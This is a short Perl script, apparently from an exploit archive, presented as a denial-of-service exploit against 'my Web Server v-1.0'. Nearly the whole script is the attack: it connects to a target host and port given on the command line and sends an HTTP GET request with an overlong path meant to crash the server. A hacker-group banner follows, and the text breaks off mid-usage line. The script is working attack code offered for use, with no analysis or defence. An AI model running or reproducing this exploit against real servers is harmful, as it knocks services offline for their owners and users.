|
#!/usr/bin/perl=0D
#my Web Server << v-1.0 Denial of Service Exploit=0D
#vendor : Eitsop.s5.com=0D
use IO::Socket;=0D
use strict;=0D
=0D
my($socket) = "";=0D
=0D
if($socket = IO::Socket::INET->new(=0D
PeerAddr => $ARGV[0],=0D
PeerPort => $ARGV[1],=0D
Proto => "TCP"))=0D
{=0D
print "++++++++++++++++++++++++++++++\n";=0D
print "Connecting to $ARGV[0]:$ARGV[1] ...\n";=0D
print "++++++++++++++++++++++++++++++\n";=0D
print "Exploit Send successfuly!!\n";=0D
print "++++++++++++++++++++++++++++++\n";=0D
print $socket "GET /aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa HTTP/1.0\r\n\r\n";=0D
close($socket);=0D
}=0D
else=0D
{=0D
print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";=0D
print " ___ ___ __ \n";=0D
print " / | \_____ ____ | | __ ___________________ \n";=0D
print "/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / \n";=0D
print "\ Y // __ \\ \___| <\ ___/| | \// / \n";=0D
print " \___|_ /(____ )\___ >__|_ \\___ >__| /_____ \ \n";=0D
print " \/ \/ \/ \/ \/ \/ \n";=0D
print " Iran Hackerz Security Team \n";=0D
print " WebSite's: www.hackerz.ir & www.h4ckerz.com \n";=0D
print "++++++++++++++++++++++++++++++++++++++++++++++++++++\n";=0D
print "[Usage]perl myws.pl